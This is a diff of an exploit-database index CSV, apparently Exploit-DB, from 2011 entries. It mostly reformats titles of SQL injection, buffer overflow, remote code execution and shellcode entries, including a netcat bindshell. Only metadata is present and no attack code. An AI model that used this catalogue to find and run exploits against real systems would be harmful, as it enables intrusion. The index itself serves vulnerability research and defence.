16941,platforms/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS - SQL Injection",2011-03-08,p0pc0rn,asp,webapps,0 -16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer m3u Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0 -16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow jpg Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 -16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor avi Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 -16945,platforms/hardware/dos/16945.pl,"Nokia N97 m3u Playlist Crash PoC",2011-03-08,KedAns-Dz,hardware,dos,0 +16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - .m3u Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0 +16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow - .jpg Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 +16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor - .avi Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 +16945,platforms/hardware/dos/16945.pl,"Nokia N97 - .m3u Playlist Crash PoC",2011-03-08,KedAns-Dz,hardware,dos,0 16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 WordPress Plugin - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,php,webapps,0 16949,platforms/php/webapps/16949.php,"maian weblog 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 @@ -14753,10 +14752,10 @@ id,file,description,date,author,platform,type,port 16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0 16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control 5.52 - Buffer Overflow",2011-03-07,Metasploit,windows,remote,0 -16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,Metasploit,windows,remote,0 +16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution",2011-03-08,Metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0 -16961,platforms/php/webapps/16961.py,"N_CMS 1.1E Pre-Auth - Local File Inclusion Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 +16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Pre-Auth Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution",2011-03-11,Metasploit,unix,remote,8812 @@ -14767,13 +14766,13 @@ id,file,description,date,author,platform,type,port 16970,platforms/windows/remote/16970.rb,"Kolibri 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,Metasploit,windows,remote,0 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player - (M3U/LST) Buffer Overflow Exploit",2011-03-14,Rh0,windows,local,0 16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0 -16973,platforms/linux/dos/16973.c,"Linux 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 +16973,platforms/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 16974,platforms/android/remote/16974.html,"Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - (.lst) Buffer Overflow Exploit (SEH)",2011-03-14,h1ch4m,windows,local,0 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - (.fcd) Buffer Overflow Exploit",2011-03-14,h1ch4m,windows,local,0 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - Javascript File Write",2011-03-14,Metasploit,windows,local,0 -16979,platforms/windows/dos/16979.html,"Opera 11.01 NULL PTR Derefernce",2011-03-15,echo,windows,dos,0 +16979,platforms/windows/dos/16979.html,"Opera 11.01 - NULL PTR Derefernce",2011-03-15,echo,windows,dos,0 16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (1)",2011-03-15,TecR0c,php,webapps,0 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server Backdoor Account Code Execution",2011-03-15,Metasploit,windows,remote,0 @@ -14801,14 +14800,14 @@ id,file,description,date,author,platform,type,port 17007,platforms/php/webapps/17007.txt,"Phpbuddies - Arbitrary Upload File",2011-03-19,Xr0b0t,php,webapps,0 17009,platforms/php/webapps/17009.txt,"CMS Balitbang 3.3 - Arbitrary File Upload",2011-03-19,eidelweiss,php,webapps,0 17011,platforms/asp/webapps/17011.txt,"Douran 3.9.7.8 - File Download/Source Code Disclosure",2011-03-20,"AJAX Security Team",asp,webapps,0 -17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 m3u Buffer Overflow Exploit",2011-03-20,"Oh Yaw Theng",windows,local,0 +17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - .m3u Buffer Overflow Exploit",2011-03-20,"Oh Yaw Theng",windows,local,0 17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - m3u SEH Overflow Exploit",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0 17014,platforms/php/webapps/17014.txt,"CMS Lokomedia 1.5 - Arbitrary File Upload",2011-03-21,eidelweiss,php,webapps,0 17015,platforms/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 - File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 17016,platforms/asp/webapps/17016.txt,"EAFlashUpload 2.5 - File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 17018,platforms/php/webapps/17018.txt,"Shimbi CMS - Multiple SQL Injection",2011-03-21,p0pc0rn,php,webapps,0 -17019,platforms/windows/dos/17019.txt,"RealPlayer 14.0.1.633 Heap Overflow",2011-03-21,"Luigi Auriemma",windows,dos,0 -17020,platforms/netware/dos/17020.py,"Novell Netware NWFTPD.NLM DELE Remote Code Execution",2011-03-21,"Francis Provencher",netware,dos,0 +17019,platforms/windows/dos/17019.txt,"RealPlayer 14.0.1.633 - Heap Overflow",2011-03-21,"Luigi Auriemma",windows,dos,0 +17020,platforms/netware/dos/17020.py,"Novell Netware - NWFTPD.NLM DELE Remote Code Execution",2011-03-21,"Francis Provencher",netware,dos,0 17021,platforms/windows/dos/17021.py,"SpoonFTP 1.2 - RETR Denial of Service",2011-03-21,"C4SS!0 G0M3S",windows,dos,0 17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17023,platforms/windows/dos/17023.txt,"iconics genesis32 and genesis64 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 @@ -14816,16 +14815,15 @@ id,file,description,date,author,platform,type,port 17025,platforms/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17026,platforms/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps,0 17027,platforms/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification",2011-03-23,Metasploit,windows,remote,0 -17028,platforms/windows/remote/17028.rb,"HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17028,platforms/windows/remote/17028.rb,"HP OpenView NNM - nnmRptConfig nameParams Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17029,platforms/windows/remote/17029.rb,"HP NNM - CGI webappmon.exe OvJavaLocale Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17030,platforms/windows/remote/17030.rb,"HP NNM - CGI webappmon.exe execvp Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17031,platforms/linux/remote/17031.rb,"Distributed Ruby send syscall",2011-03-23,Metasploit,linux,remote,0 17032,platforms/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,windows,dos,0 -17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS",2011-03-23,"Jeremy Brown",windows,dos,0 -17034,platforms/windows/remote/17034.py,"Progea Movicon 11 TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 +17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free DoS",2011-03-23,"Jeremy Brown",windows,dos,0 +17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0 17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum - Injection",2011-03-23,eXeSoul,asp,webapps,0 -17037,platforms/windows/remote/17037.rb,"PostgreSQL for Microsoft Windows Payload Execution",2011-03-23,Metasploit,windows,remote,0 17038,platforms/windows/remote/17038.rb,"HP OpenView NNM - nnmRptConfig.exe schdParams Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager - snmpviewer.exe Buffer Overflow",2011-03-23,Metasploit,windows,remote,80 17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager - getnnmdata.exe (ICount) CGI Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 @@ -14855,18 +14853,18 @@ id,file,description,date,author,platform,type,port 17071,platforms/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI DoS PoC",2011-03-29,BraniX,windows,dos,0 17072,platforms/windows/dos/17072.py,"Windows Explorer 6.0.2900.5512 - (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC",2011-03-29,BraniX,windows,dos,0 17074,platforms/windows/dos/17074.py,"Winamp 5.61 - AVI DoS PoC",2011-03-29,BraniX,windows,dos,0 -17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 AVI DoS PoC",2011-03-30,BraniX,windows,dos,0 +17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 - .AVI DoS PoC",2011-03-30,BraniX,windows,dos,0 17076,platforms/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 17077,platforms/php/webapps/17077.txt,"pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0 17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0 17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0 17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 - Remote File Upload",2011-03-30,Net.Edit0r,php,webapps,0 -17081,platforms/asp/webapps/17081.txt,"CosmoQuest Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 +17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - (.ZIP) Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 17084,platforms/php/webapps/17084.txt,"Andy's PHP Knowledgebase 0.95.2 - (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps,0 -17086,platforms/windows/local/17086.pl,"Word List Builder Buffer Overflow Exploit (SEH)",2011-04-01,h1ch4m,windows,local,0 +17086,platforms/windows/local/17086.pl,"Word List Builder - Buffer Overflow Exploit (SEH)",2011-04-01,h1ch4m,windows,local,0 17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer overflow/DOS Exploit (0Day)",2011-04-01,^Xecuti0N3r,windows,dos,0 17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer overflow/DOS Exploit (0Day)",2011-04-01,^Xecuti0N3r,windows,dos,0 17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - CSRF (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14876,7 +14874,7 @@ id,file,description,date,author,platform,type,port 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - CSRF (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17096,platforms/php/webapps/17096.html,"Allomani Super Multimedia Library 2.5.0 - CSRF (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps,0 -17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation pre-auth kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 +17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Pre-Auth kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - XSS",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - CSRF",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - news.php (id) SQL Injection news.php (id)",2011-04-02,"Easy Laster",php,webapps,0 @@ -14893,10 +14891,10 @@ id,file,description,date,author,platform,type,port 17110,platforms/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Stored XSS Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0 17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Stored / Reflective XSS",2011-04-04,"Michael Brooks",multiple,webapps,0 17112,platforms/hardware/webapps/17112.txt,"Encore ENPS-2012 - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 -17113,platforms/hardware/webapps/17113.txt,"TP-Link TL-PS110U & TL-PS110P Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 +17113,platforms/hardware/webapps/17113.txt,"TP-Link TL-PS110U / TL-PS110P - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17114,platforms/hardware/webapps/17114.txt,"Planex Mini-300PU & Mini100s - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 -17115,platforms/hardware/webapps/17115.txt,"ZO Tech Multiple Print Servers Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 -17116,platforms/hardware/webapps/17116.txt,"Longshine Multiple Print Servers Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 +17115,platforms/hardware/webapps/17115.txt,"ZO Tech Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 +17116,platforms/hardware/webapps/17116.txt,"Longshine Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17117,platforms/hardware/webapps/17117.txt,"Planet FPS-1101 - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 17119,platforms/php/webapps/17119.txt,"WordPress Plugin Custom Pages 0.5.0.1 - LFI",2011-04-05,"AutoSec Tools",php,webapps,0 @@ -14918,7 +14916,7 @@ id,file,description,date,author,platform,type,port 17178,platforms/php/webapps/17178.txt,"Blue Hat - Sensitive Database Disclosure / SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0 17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS - SQL Injection",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 -17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 +17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,php,webapps,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 @@ -14928,7 +14926,7 @@ id,file,description,date,author,platform,type,port 17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge - Arbitrary Java Code Execution",2011-04-05,Metasploit,multiple,remote,10001 17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,Metasploit,windows,remote,0 17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 - RTX Buffer Overflow",2011-04-08,Metasploit,windows,local,0 -17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,Metasploit,windows,remote,25 +17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar - MAILTO Buffer Overflow",2011-04-04,Metasploit,windows,remote,25 17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager - Authenticated Code Execution",2011-04-08,Metasploit,windows,remote,9090 17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro 1.70 - (.visprj) Buffer Overflow",2011-04-11,Metasploit,windows,local,0 17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0 @@ -14948,19 +14946,19 @@ id,file,description,date,author,platform,type,port 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - (.pls) Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script - Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 -17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Post-authentication Local File Inclusion/Edit",2011-04-15,bitform,multiple,webapps,0 +17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion/Edit",2011-04-15,bitform,multiple,webapps,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS - Shell Upload",2011-04-16,Alexander,asp,webapps,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0 -17183,platforms/php/webapps/17183.txt,"osPHPSite SQL Injection",2011-04-17,"vir0e5 ",php,webapps,0 -17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 +17183,platforms/php/webapps/17183.txt,"osPHPSite - SQL Injection",2011-04-17,"vir0e5 ",php,webapps,0 +17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow Exploit",2011-04-18,sickness,windows,local,0 17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injection Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 -17191,platforms/php/webapps/17191.txt,"Ultimate eShop Error Based SQL Injection",2011-04-20,Romka,php,webapps,0 +17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error Based SQL Injection",2011-04-20,Romka,php,webapps,0 17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple XSS Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 17193,platforms/php/webapps/17193.html,"SocialCMS1.0.2 - Multiple CSRF Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 @@ -14982,7 +14980,7 @@ id,file,description,date,author,platform,type,port 17216,platforms/php/webapps/17216.txt,"Quick.CMS 3.0 - CSRF",2011-04-26,^Xecuti0N3r,php,webapps,0 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 -17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server Directory Traversal Remote Code Execution",2011-04-27,Metasploit,windows,remote,18821 +17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution",2011-04-27,Metasploit,windows,remote,18821 17220,platforms/php/webapps/17220.txt,"eyeos 1.9.0.2 - Stored XSS using image files",2011-04-28,"Alberto Ortega",php,webapps,0 17221,platforms/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"libmodplug 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 @@ -15009,7 +15007,7 @@ id,file,description,date,author,platform,type,port 17244,platforms/hardware/remote/17244.txt,"ZyWALL USG - Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0 17242,platforms/asp/webapps/17242.txt,"Sothink DHTML Menu SQL Injection",2011-05-04,Caddy-Dz,asp,webapps,0 17248,platforms/php/webapps/17248.txt,"PHPDug 2.0.0 - Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",php,webapps,0 -17250,platforms/php/webapps/17250.txt,"phpThumb 'phpThumbDebug' Information Disclosure",2011-05-06,mook,php,webapps,0 +17250,platforms/php/webapps/17250.txt,"phpThumb - 'phpThumbDebug' Information Disclosure",2011-05-06,mook,php,webapps,0 17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - CSRF",2011-05-06,"High-Tech Bridge SA",php,webapps,0 17252,platforms/windows/remote/17252.rb,"VideoLAN VLC - ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,Metasploit,windows,remote,0 17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0 @@ -15025,7 +15023,7 @@ id,file,description,date,author,platform,type,port 17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences (0Day)",2011-05-12,"Stefan LE BERRE",windows,dos,0 17274,platforms/windows/dos/17274.txt,"SlimPDF Reader PoC",2011-05-12,"Nicolas Krassas",windows,dos,0 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0 -17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 +17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0 17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Remote File Upload",2011-05-14,"Number 7",php,webapps,0 @@ -15033,7 +15031,7 @@ id,file,description,date,author,platform,type,port 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0 17289,platforms/php/webapps/17289.txt,"frame-oshop - SQL Injection",2011-05-15,-SmoG-,php,webapps,0 17290,platforms/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0 / 2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote,0 -17291,platforms/windows/dos/17291.py,"Steam Software Denial of Service",2011-05-16,david.r.klein,windows,dos,0 +17291,platforms/windows/dos/17291.py,"Steam Software - Denial of Service",2011-05-16,david.r.klein,windows,dos,0 17292,platforms/php/webapps/17292.txt,"Media In Spot CMS - Local File Inclusion",2011-05-16,"wlhaan haker",php,webapps,0 17293,platforms/php/webapps/17293.txt,"Media In Spot CMS - SQL Injection",2011-05-16,"Iolo Morganwg",php,webapps,0 17294,platforms/windows/local/17294.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow",2011-05-16,sinfulsecurity,windows,local,0 @@ -15049,14 +15047,14 @@ id,file,description,date,author,platform,type,port 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0 17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0 -17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0 +17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0 17308,platforms/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps,0 17311,platforms/php/webapps/17311.txt,"E-Manage MySchool 7.02 - SQL Injection",2011-05-21,az7rb,php,webapps,0 17312,platforms/php/webapps/17312.txt,"tugux CMS 1.2 - Multiple Vulnerabilities",2011-05-22,LiquidWorm,php,webapps,0 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow",2011-05-22,Metasploit,windows,local,0 17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x 4.1.2 - (search.php) SQL Injection",2011-05-23,D4rkB1t,php,webapps,0 -17316,platforms/php/webapps/17316.txt,"PHPortfolio SQL Injection",2011-05-23,lionaneesh,php,webapps,0 +17316,platforms/php/webapps/17316.txt,"PHPortfolio - SQL Injection",2011-05-23,lionaneesh,php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 - LFI",2011-05-25,"AutoSec Tools",php,webapps,0 17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 - (cal_search.php) SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 17322,platforms/php/webapps/17322.txt,"egroupware 